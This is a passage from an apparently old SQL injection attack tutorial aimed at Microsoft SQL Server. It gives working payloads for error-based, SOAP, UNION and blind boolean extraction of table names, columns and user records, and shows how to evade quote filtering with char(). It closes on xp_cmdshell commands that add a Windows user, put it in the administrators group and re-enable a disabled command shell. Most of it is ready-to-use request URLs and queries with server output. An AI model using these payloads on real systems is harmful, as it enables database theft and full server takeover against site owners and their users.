when converting the nvarchar value 'cwh' to data type int.&lt;br /&gt;  /page.asp, line 9&lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; OK, we get another "uname" which is 'cwh'. If we try following request.&lt;br /&gt;  &lt;br /&gt;  [SQLi]------------------------------------------------------------------------------&lt;br /&gt;  http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+uname+from+users+where+uname+not+in+('admin','cwh')))--&lt;br /&gt;  [End SQLi]--------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; And we get an error like this&lt;br /&gt;&lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;  ADODB.Field error '800a0bcd'&lt;br /&gt;  Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.&lt;br /&gt;  /showthread.asp, line 10 &lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; It means there are only two uname in users table (admin,cwh).&lt;br /&gt; &lt;br /&gt;&lt;br /&gt; +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt; [0x02d] - MSSQL Injection in Web Services (SOAP Injection)&lt;br /&gt; +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt;  &lt;br /&gt;  Web Services use XML messages that follow the SOAP standard and have been popular with traditional enterprise. &lt;br /&gt; In such systems, there is often a machine-readable description of the operations offered by the service written in the &lt;br /&gt; Web Services Description Language (WSDL). &lt;br /&gt;  SOAP is often used in large-scale enterprise applications where individual tasks are performed by different computers to &lt;br /&gt; improve performance. It's often found where web application that deployed as a front-end to an existing application.&lt;br /&gt;&lt;br /&gt;   Let's take a look for SOAP request like this:&lt;br /&gt; &lt;br /&gt;  [SOAP Request]------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;  POST /webservice/service.asmx HTTP/1.0&lt;br /&gt;  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433)&lt;br /&gt;  Content-Type: text/xml; charset=utf-8&lt;br /&gt;  SOAPAction: "http://tempuri.org/GetUserInfo"&lt;br /&gt;  Host: testcwh.cwh.net&lt;br /&gt;  Content-Length: 345&lt;br /&gt;  Expect: 100-continue&lt;br /&gt;  Connection: Keep-Alive&lt;br /&gt; &lt;br /&gt;  &lt;soap:envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;&lt;br /&gt;  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"&amp;gt;&lt;soap:body&gt;&lt;br /&gt;  &lt;getuserinfo xmlns="http://tempuri.org/"&gt;&lt;username&gt;admin&lt;/username&gt;&lt;password&gt;1234&lt;/password&gt;&lt;/getuserinfo&gt;&lt;/soap:body&gt;&lt;/soap:envelope&gt;&lt;br /&gt;  &lt;br /&gt;  [End Request]-------------------------------------------------------------------------------&lt;br /&gt; &lt;br /&gt;   Can you see username(admin) and password(1234) that send to Server side ?&lt;br /&gt;&lt;br /&gt;   What's happen if we injection (') single quote to username field like this: &lt;username&gt;admin'&lt;/username&gt;&lt;password&gt;1234&lt;/password&gt;&lt;br /&gt;  before It send to Server Side. We can use Web proxy (Burpsuite, Paros proxy) to intercept SOAP request and SOAP respond.&lt;br /&gt;&lt;br /&gt;  [SOAP Respond When we inject single quote]--------------------------------------------------&lt;br /&gt; &lt;br /&gt;  HTTP/1.1 200 OK&lt;br /&gt;  Date: Mon, 26 Jan 2009 15:45:27 GMT&lt;br /&gt;  Server: Microsoft-IIS/6.0&lt;br /&gt;  X-Powered-By: ASP.NET&lt;br /&gt;  X-AspNet-Version: 2.0.50727&lt;br /&gt;  Cache-Control: private, max-age=0&lt;br /&gt;  Content-Type: text/xml; charset=utf-8&lt;br /&gt;  Content-Length: 1057&lt;br /&gt;  Connection: close&lt;br /&gt;  X-Junk: xxxxxxxxxxx&lt;br /&gt; &lt;br /&gt;  &lt;soap:envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;&lt;br /&gt;  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"&amp;gt;&lt;soap:body&gt;&lt;br /&gt;  &lt;getuserinforesponse xmlns="http://tempuri.org/"&gt;&lt;getuserinforesult&gt;&lt;erroroccured&gt;true&lt;/erroroccured&gt;&lt;errorstr&gt;&lt;br /&gt;  System.Data.OleDb.OleDbException: Unclosed quotation mark after the character string ''.&lt;br /&gt;  Incorrect syntax near '81'.&lt;br /&gt;     at System.Data.OleDb.OleDbDataReader.ProcessResults(OleDbHResult hr)&lt;br /&gt;     at System.Data.OleDb.OleDbDataReader.NextResult()&lt;br /&gt;     at System.Data.OleDb.OleDbCommand.ExecuteReaderInternal(CommandBehavior behavior, String method)&lt;br /&gt;     at System.Data.OleDb.OleDbCommand.ExecuteReader(CommandBehavior behavior)&lt;br /&gt;     at Service.GetUserInfo(String username, String password)&lt;/errorstr&gt;&lt;sqlquery&gt;SELECT * FROM users WHERE username='admin'' &lt;br /&gt;     AND password='81dc9bdb52d04dc20036dbd8313ed055'&lt;/sqlquery&gt;&lt;id&gt;-1&lt;/id&gt;&lt;joindate&gt;0001-01-01T00:00:00&lt;/joindate&gt;&lt;/getuserinforesult&gt;&lt;br /&gt;     &lt;/getuserinforesponse&gt;&lt;/soap:body&gt;&lt;/soap:envelope&gt;&lt;br /&gt;  &lt;br /&gt;  [End Respond]-------------------------------------------------------------------------------&lt;br /&gt; &lt;br /&gt;  Okey, The SOAP respond return error message like that. We can use simple techiques for SQLi that we showed you &lt;br /&gt;  in section [0x02b] - ODBC Error Message Attack with "CONVERT", Let's use this SQLi: &lt;br /&gt;  &lt;br /&gt;   admin' and 1=convert(int,@@version)--&lt;br /&gt; &lt;br /&gt;  [SOAP Request/Respond]----------------------------------------------------------------------&lt;br /&gt;  &lt;br /&gt;  *** Request ***&lt;br /&gt;  POST /webservice/service.asmx HTTP/1.0&lt;br /&gt;  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433)&lt;br /&gt;  Content-Type: text/xml; charset=utf-8&lt;br /&gt;  SOAPAction: "http://tempuri.org/GetUserInfo"&lt;br /&gt;  Host: testcwh.cwh.net&lt;br /&gt;  Content-Length: 384&lt;br /&gt;  &lt;br /&gt;  &lt;soap:envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;&lt;br /&gt;  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"&amp;gt;&lt;soap:body&gt;&lt;br /&gt;  &lt;getuserinfo xmlns="http://tempuri.org/"&gt;&lt;username&gt;admin' and 1=convert(int,@@version)--&lt;/username&gt;&lt;password&gt;1234&lt;/password&gt;&lt;br /&gt;  &lt;/getuserinfo&gt;&lt;/soap:body&gt;&lt;/soap:envelope&gt;&lt;br /&gt;  &lt;br /&gt;  &lt;br /&gt;  *** Response ***&lt;br /&gt;  HTTP/1.1 200 OK&lt;br /&gt;  Date: Wed, 28 Jan 2009 15:59:17 GMT&lt;br /&gt;  Server: Microsoft-IIS/6.0&lt;br /&gt;  X-Powered-By: ASP.NET&lt;br /&gt;  X-AspNet-Version: 2.0.50727&lt;br /&gt;  Cache-Control: private, max-age=0&lt;br /&gt;  Content-Type: text/xml; charset=utf-8&lt;br /&gt;  Content-Length: 1266&lt;br /&gt;  Connection: close&lt;br /&gt;  X-Junk: xxxxxxxxxxx&lt;br /&gt;  &lt;br /&gt;  &lt;soap:envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;&lt;br /&gt;  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"&amp;gt;&lt;soap:body&gt;&lt;br /&gt;  &lt;getuserinforesponse xmlns="http://tempuri.org/"&gt;&lt;getuserinforesult&gt;&lt;erroroccured&gt;true&lt;/erroroccured&gt;&lt;errorstr&gt;&lt;br /&gt;  System.Data.OleDb.OleDbException: Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) &lt;br /&gt;  Feb  &lt;span class="skype_pnh_print_container"&gt;9 2007 22&lt;/span&gt;&lt;span class="skype_pnh_container" dir="ltr" tabindex="-1"&gt;&lt;span class="skype_pnh_mark"&gt; begin_of_the_skype_highlighting&lt;/span&gt;&amp;nbsp;&lt;span class="skype_pnh_highlighting_inactive_common" dir="ltr" title="Call this phone number in Argentina with Skype: +549200722"&gt;&lt;span class="skype_pnh_left_span"&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class="skype_pnh_dropart_span" title="Skype actions"&gt;&lt;span class="skype_pnh_dropart_flag_span" style="background-position: -285px 1px ! important;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class="skype_pnh_textarea_span"&gt;&lt;span class="skype_pnh_text_span"&gt;9 2007 22&lt;/span&gt;&lt;/span&gt;&lt;span class="skype_pnh_right_span"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;span class="skype_pnh_mark"&gt;end_of_the_skype_highlighting&lt;/span&gt;&lt;/span&gt;:47:07 &lt;br /&gt;  Copyright (c) 1988-2005 Microsoft Corporation&lt;br /&gt;  Express Edition on Windows NT 5.2 (Build 3790: Service Pack 1)&lt;br /&gt;  ' to data type int.&lt;br /&gt;  at System.Data.OleDb.OleDbDataReader.ProcessResults(OleDbHResult hr)&lt;br /&gt;  at System.Data.OleDb.OleDbDataReader.NextResult()&lt;br /&gt;  at System.Data.OleDb.OleDbCommand.ExecuteReaderInternal(CommandBehavior behavior, String method)&lt;br /&gt;  at System.Data.OleDb.OleDbCommand.ExecuteReader(CommandBehavior behavior)&lt;br /&gt;  at Service.GetUserInfo(String username, String password)&lt;/errorstr&gt;&lt;sqlquery&gt;SELECT * FROM users WHERE username='admin' &lt;br /&gt;  and 1=convert(int,@@version)--' AND password='81dc9bdb52d04dc20036dbd8313ed055'&lt;/sqlquery&gt;&lt;id&gt;-1&lt;/id&gt;&lt;joindate&gt;0001-01-01T00:00:00&lt;/joindate&gt;&lt;br /&gt;  &lt;/getuserinforesult&gt;&lt;/getuserinforesponse&gt;&lt;/soap:body&gt;&lt;/soap:envelope&gt;&lt;br /&gt; &lt;br /&gt;  [End]---------------------------------------------------------------------------------------&lt;br /&gt; &lt;br /&gt;   W00t!! W00t!!, We can enumerate MSSQL Version : Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86).&lt;br /&gt;  Then we can use SQLi techniques that we mention above (Dump tables, columns, data, Etc).&lt;br /&gt;&lt;br /&gt; ++++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt;  [0x02c] - MSSQL Injection with UNION Attack&lt;br /&gt; ++++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt;&lt;br /&gt;  This method differs from the both previous methods because we do not get information through error &lt;br /&gt; but we, instead, see it in some point of returned page.&lt;br /&gt;&lt;br /&gt; First of all, we have to know the exact number of selected column. We can find it by using ORDER BY clause.&lt;br /&gt;&lt;br /&gt;  http://www.example.com/page.asp?id=1 order by 1--&lt;br /&gt;  http://www.example.com/page.asp?id=1 order by 2--&lt;br /&gt;  http://www.example.com/page.asp?id=1 order by 3--&lt;br /&gt;  http://www.example.com/page.asp?id=1 order by 4--&lt;br /&gt;  and so on&lt;br /&gt;&lt;br /&gt; We observe a result from each request until we get error like this.&lt;br /&gt;  &lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;  Microsoft SQL Native Client error '80040e14'&lt;br /&gt;  The ORDER BY position number 5 is out of range of the number of items in the select list.&lt;br /&gt;  /showthread.asp, line 9&lt;br /&gt;  ------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; This means this page select four columns from table and this error occurs when we request http://www.example.com/page.asp?id=1 order by 5--&lt;br /&gt;&lt;br /&gt; Now, we use UNION operator to gain information.&lt;br /&gt;  &lt;br /&gt;  [SQLi]------------------------------------------------------------------------------&lt;br /&gt;  http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,44--&lt;br /&gt;  [End SQLi]--------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; We will see "11" or "22" or "33" or "44" appeared on some point in returned page. We assume that &lt;br /&gt; we have already located the position which "44" occur on the screen.&lt;br /&gt; (We should remember this position because it is where our information will be appeared)&lt;br /&gt;&lt;br /&gt; As we found "44" on the screen, we replace "44" with "@@version" in order to find the version of MSSQL.&lt;br /&gt;  &lt;br /&gt;  [SQLi]------------------------------------------------------------------------------&lt;br /&gt;  http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,@@version--&lt;br /&gt;  [End SQLi]--------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; We will see version of MSSQL appeared in the position which "44" occurred.&lt;br /&gt;&lt;br /&gt; At this point, we know that next information definitely takes place in this position.&lt;br /&gt;&lt;br /&gt;  The rest are to find table names, column names and data. As we see in previous section, &lt;br /&gt; we can obtain table names and column names through "information_schema" database.&lt;br /&gt; We still use the same way in this approach.&lt;br /&gt;  &lt;br /&gt;  [SQli]------------------------------------------------------------------------------&lt;br /&gt;  http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,table_name from information_schema.tables--&lt;br /&gt;  [End SQLi]--------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; We will see the first table on the screen. We assume it is table called 'threads'. We can find next table by following request.&lt;br /&gt;  &lt;br /&gt;  [SQli]------------------------------------------------------------------------------&lt;br /&gt;  http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,table_name from information_schema.tables where table_name not in ('threads')--&lt;br /&gt;  [End SQLi]--------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; We assume the retrieved table is 'users'. So, we append a known table list until we get blank in position which "44" occurred.&lt;br /&gt; After we get all table names that we want, we move to gather column names.&lt;br /&gt;  &lt;br /&gt;  [SQli]------------------------------------------------------------------------------&lt;br /&gt;  http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,column_name from information_schema.columns where table_name='users'--&lt;br /&gt;  [End SQLi]--------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; From this request, we will see the first column in table 'users'. We assume it is 'uname'. For another column, we can use following request.&lt;br /&gt;  &lt;br /&gt;  [SQLi]------------------------------------------------------------------------------&lt;br /&gt;  http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,column_name from information_schema.columns where table_name='users' and &lt;br /&gt;  column_name not in ('uname')--&lt;br /&gt;  [End SQLi]--------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; We get the second column which is 'upass' and we continue appending a known column list until we get blank result.&lt;br /&gt; The most wanted information is data. It is quite simple after we obtained table names and column names. We just use following request.&lt;br /&gt;  &lt;br /&gt;  [SQLi]------------------------------------------------------------------------------&lt;br /&gt;  http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,uname from users--&lt;br /&gt;  [End SQLi]--------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; We will get data such as admin from the request. In order to get another row, we only append information list as following.&lt;br /&gt;&lt;br /&gt;  [SQLi]------------------------------------------------------------------------------&lt;br /&gt;  http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,uname from users where uname not in ('admin')--&lt;br /&gt;  [End SQLi]--------------------------------------------------------------------------&lt;br /&gt; &lt;br /&gt; Now, we can enumerate the rest data.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###########################################&lt;br /&gt; [0x03] - MSSQL Blind SQL Injection Attack&lt;br /&gt;###########################################&lt;br /&gt;&lt;br /&gt; &lt;br /&gt; In some case, Using normal sql injection is not work. Blind sql injection is another method which may help you.&lt;br /&gt;The important point for blind sql injection is the difference between the valid and invalid query result.&lt;br /&gt;You have to inject a statement to make query valid or invalid and observe the response.&lt;br /&gt; Just because you don't see any results, doesn't mean that your injected SQL is not being executed !!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt;  [0x03a] - How to Test sites that are vulnerable in Blind SQL Injection&lt;br /&gt; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt;&lt;br /&gt;  We assume that http://www.example.com/page.asp?id=1 is normal url to open web page.&lt;br /&gt;&lt;br /&gt; You can try to inject a statement like this&lt;br /&gt;&lt;br /&gt; http://www.example.com/page.asp?id=1 and 1=1 &lt;br /&gt; and&lt;br /&gt; http://www.example.com/page.asp?id=1 and 1=2&lt;br /&gt;&lt;br /&gt;  If the results from these requests are different, it will be a good signal for you.&lt;br /&gt; This website may fall to blind sql injection vulnerability. When you put "id=1 and 1=1", &lt;br /&gt; it means that the condition is true so, the response must be normal. &lt;br /&gt; But the parameter "id=1 and 1=2" indicates that the condition is false &lt;br /&gt; and if the webmaster does not provide a proper filter, the response absolutely differs from previous.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; ++++++++++++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt;  [0x03b] - Determine data through Blind SQL Injection&lt;br /&gt; ++++++++++++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt;&lt;br /&gt;  By using blind technique, you have to spend more time than normal injection. &lt;br /&gt; You can obtain only one character while you send several queries to server.&lt;br /&gt; We will give you an example of querying the first character of database name. &lt;br /&gt; We assume that database name is member. Therefore, the first character is "m" &lt;br /&gt; which the ascii value is 109. (At this point, we assume that you know ascii code)&lt;br /&gt;&lt;br /&gt; Ok, first, we have to know that the results from requests have only 2 forms.&lt;br /&gt;&lt;br /&gt; 1. Valid query result likes http://www.example.com/page.asp?id=1 and 1=1&lt;br /&gt; 2. Invalid query result likes http://www.example.com/page.asp?id=1 and 1=2&lt;br /&gt;&lt;br /&gt; &lt;br /&gt; The following steps are up to each person. You idea may be different from our idea in order to pick ascii code to test query.&lt;br /&gt;&lt;br /&gt; http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)&amp;gt;90&lt;br /&gt;&lt;br /&gt; In this situation, the result will be valid query result like http://www.example.com/page.asp?id=1 and 1=1 &lt;br /&gt; (because the first character of database name is "m" which ascii code is 109). Then, we try&lt;br /&gt;&lt;br /&gt; http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)&amp;gt;120&lt;br /&gt;&lt;br /&gt; It is surely that the result will like http://www.example.com/page.asp?id=1 and 1=2 (because 109 absolutely less than 120).&lt;br /&gt; next, we try&lt;br /&gt;&lt;br /&gt; http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)&amp;gt;105&lt;br /&gt;&lt;br /&gt; The result is a valid query result and at this point, the ascii value of first character of database name is between 105 and 120.&lt;br /&gt; So, we try&lt;br /&gt;&lt;br /&gt; http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)&amp;gt;112  ===&amp;gt; invalid query result&lt;br /&gt; http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)&amp;gt;108  ===&amp;gt; valid query result&lt;br /&gt; http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)&amp;gt;110  ===&amp;gt; invalid query result&lt;br /&gt; http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)&amp;gt;109  ===&amp;gt; invalid query result&lt;br /&gt;&lt;br /&gt;  You see that the first character of database name has an ascii value which is greater than 108 &lt;br /&gt; but is not greater than 109. Thus, we can conclude that the ascii value is equal to 109.&lt;br /&gt; You can prove with:&lt;br /&gt; &lt;br /&gt; http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)=109 .&lt;br /&gt; &lt;br /&gt; We sure that the result is like the result of http://www.target.com/page.php?id=1 and 1=1 .&lt;br /&gt;&lt;br /&gt; The rest which you have to do is to manipulate some queries to collect your preferred information.&lt;br /&gt; In this tutorial, we propose some example queries in order to find the names of tables and columns in the database.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; ++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt;  [0x03c] - Exploit query for get Table name &lt;br /&gt; ++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt;&lt;br /&gt;  In order to get table name, we can use above method to obtain each character of table name.&lt;br /&gt; The only thing that we have to do is to change query to retrieve table name of current database. &lt;br /&gt; As MSSQL does not have limit command. Therefore, the query is a bit complicate.&lt;br /&gt;&lt;br /&gt; http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) &lt;br /&gt; FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55))&lt;br /&gt; AS varchar(8000)),1,1)),0)&amp;gt;97&lt;br /&gt;&lt;br /&gt;  The above query is used to determine the first character of first table in current database. If we want to find second character of first table,&lt;br /&gt; we can do by following request:&lt;br /&gt;&lt;br /&gt; http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) &lt;br /&gt; FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55))&lt;br /&gt; AS varchar(8000)),2,1)),0)&amp;gt;97&lt;br /&gt;&lt;br /&gt;  We change the second parameter of substring function from 1 to 2 in order to specify preferred position of character in table name.&lt;br /&gt; Thus, if we want to determine other positions, we require only changing second parameter of substring function.&lt;br /&gt;&lt;br /&gt;  In case of other tables, we can find other table names by changing the second select &lt;br /&gt; from "SELECT TOP 1" to be "SELECT TOP 2" , "SELECT TOP 3" and so on. for example,&lt;br /&gt;&lt;br /&gt; http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) &lt;br /&gt; FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 2 LOWER(name) FROM sysObjects WHERE xtYpe=0x55))&lt;br /&gt; AS varchar(8000)),1,1)),0)=97&lt;br /&gt;&lt;br /&gt;  The above request will determine the first character of the second table name in current database.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; +++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt;  [0x03d] - Exploit query for get Column name &lt;br /&gt; +++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt;&lt;br /&gt;  After we obtain table names, the next target information is absolutely column names. &lt;br /&gt;&lt;br /&gt; http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM &lt;br /&gt; syscolumns i WHERE(i.colid&amp;lt;=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE &lt;br /&gt; id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=1))AS varchar(8000)),1,1)),0)&amp;gt;97&lt;br /&gt;&lt;br /&gt;  In order to circumvent from magic quote filtering, you have to change 'tablename' &lt;br /&gt; to be the form of concatenating char() command. for example, if table name is 'user', &lt;br /&gt; when we put 'user' in the query, ' may be filtered and our query will be wrong.&lt;br /&gt; The solution is convert 'user' to be char(117)+char(115)+char(101)+char(114). &lt;br /&gt; So, the query in where cluase changes from "Where name='user'" to "Where name=char(117)+char(115)+char(101)+char(114)".&lt;br /&gt; In this case, we can circumvent magic quote filtering. The result from the above request is the first character of the first column name of specific table.&lt;br /&gt; When we want to find the second character of the first column, we can use the same method as getting table name, by changing the second parameter of &lt;br /&gt; substring function.&lt;br /&gt;&lt;br /&gt; http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM &lt;br /&gt; syscolumns i WHERE(i.colid&amp;lt;=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE &lt;br /&gt; id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=1))AS varchar(8000)),2,1)),0)&amp;gt;97&lt;br /&gt;&lt;br /&gt; The above request is used to determine the second character of the first column name in specific table.&lt;br /&gt; In case of determining other columns, we can do by changing p.x value from 1 to 2,3,4 and so on. such as,&lt;br /&gt;&lt;br /&gt; http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM &lt;br /&gt; syscolumns i WHERE(i.colid&amp;lt;=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE &lt;br /&gt; id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=2))AS varchar(8000)),1,1)),0)&amp;gt;97&lt;br /&gt;&lt;br /&gt; The first character of the second column name in specific table can be determined by the above request.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;############################################## &lt;br /&gt; [0x04] - More Dangerous SQL Injection Attack&lt;br /&gt;##############################################&lt;br /&gt;  &lt;br /&gt;  In Chapter [0x02] and [0x03], We described about retrieving any useful data that was extracted from database &lt;br /&gt; via SQL Injection techniques - for example, by performing a UNION Attack, Returning data in an error message and Blind injection. &lt;br /&gt;  This chapter will not show only an data extraction but command execution and sql worms as well.&lt;br /&gt;&lt;br /&gt; +++++++++++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt;  [0x04a] - Dangerous from Extended Stored Procedures&lt;br /&gt; +++++++++++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt;&lt;br /&gt;  xp_cmdshell          - Executes a given command on the MSSQL Operation system&lt;br /&gt;                - Available by default on all MSSQL (Disabled on MSSQL 2005)&lt;br /&gt;                - Can only be executed by 'sa' and any other users with 'sysadmin' privileges&lt;br /&gt;  &lt;br /&gt;  xp_regxxx            - Read/Write registry keys, potentially including the Read SAM file&lt;br /&gt;   &lt;br /&gt;   xp_regread &lt;br /&gt;   xp_regwrite&lt;br /&gt;   xp_regdeletekey&lt;br /&gt;   xp_regdeletevalue&lt;br /&gt;   xp_regenumkeys&lt;br /&gt;   xp_regenumvalues&lt;br /&gt;&lt;br /&gt;   [Example for determines what null-session shares are available on the server]&lt;br /&gt;   exec xp_regread HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters','nullsessionshares'&lt;br /&gt; &lt;br /&gt;  xp_servicecontrol    - Allows to Manage Services&lt;br /&gt;   &lt;br /&gt;   [Example Command]--------------------------------------------------------------------&lt;br /&gt;   exec master..xp_servicecontrol 'start','schedule'&lt;br /&gt;   exec master..xp_servicecontrol 'start','server'&lt;br /&gt;   [End Command]------------------------------------------------------------------------&lt;br /&gt;  &lt;br /&gt;  xp_availablemedia    - Reveals the available drives on the machine&lt;br /&gt;  xp_dirtree      - Allows a directory tree to be obtained&lt;br /&gt;  xp_enumdsn      - Enumerates ODBC data sources on the server&lt;br /&gt;  xp_makecab      - Allows the user to create a compressed archive of files on the server&lt;br /&gt;  xp_ntsec_enumdomains - Enumerates domains that the server can access&lt;br /&gt;  xp_terminate_process - Terminate a process (PID)&lt;br /&gt;  xp_loginconfig      - Login mode&lt;br /&gt; &lt;br /&gt; +++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt;  [0x04b] - Advanced SQL Injection Techniques&lt;br /&gt; +++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt;  &lt;br /&gt;  "xp_cmdshell" Stored procedures, executes any command shell in the server with the same permissions that it is currently running. &lt;br /&gt; By default, only sysadmin is allowed to use it and in SQL Server 2005 it is disabled by default (it can be enabled again using sp_configure) &lt;br /&gt;&lt;br /&gt; EXEC master.dbo.xp_cmdshell 'net user cwh cwh1234 /add' ;--   //Use for add user "cwh" into system.&lt;br /&gt; EXEC master.dbo.xp_cmdshell 'net localgroup administrators cwh /add' ;-- //Use for escalating privilege "cwh" to admin group&lt;br /&gt;&lt;br /&gt; Example through SQL injection in a numeric field via a GET request:&lt;br /&gt; http://www.example.com/news.asp?id=1; exec master.dbo.xp_cmdshell 'command'&lt;br /&gt;&lt;br /&gt; On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default:&lt;br /&gt;&lt;br /&gt; EXEC sp_configure 'show advanced options', 1;--&lt;br /&gt; RECONFIGURE;-- &lt;br /&gt; EXEC sp_configure 'xp_cmdshell', 1;-- &lt;br /&gt; RECONFIGURE;--  &lt;br /&gt;&lt;br /&gt; On MSSQL 2000:&lt;br /&gt; &lt;br /&gt; If you have 'sa' privileges but xp_cmdshell has been disabled/removed with sp_dropextendedproc, &lt;br /&gt; we can simply inject the following code:&lt;br /&gt;&lt;br /&gt; EXEC sp_addextendedproc 'xp_anyname', 'xp_log70.dll';--&lt;br /&gt;&lt;br /&gt;  This creates a new stored procedure 'xp_anyname' linked 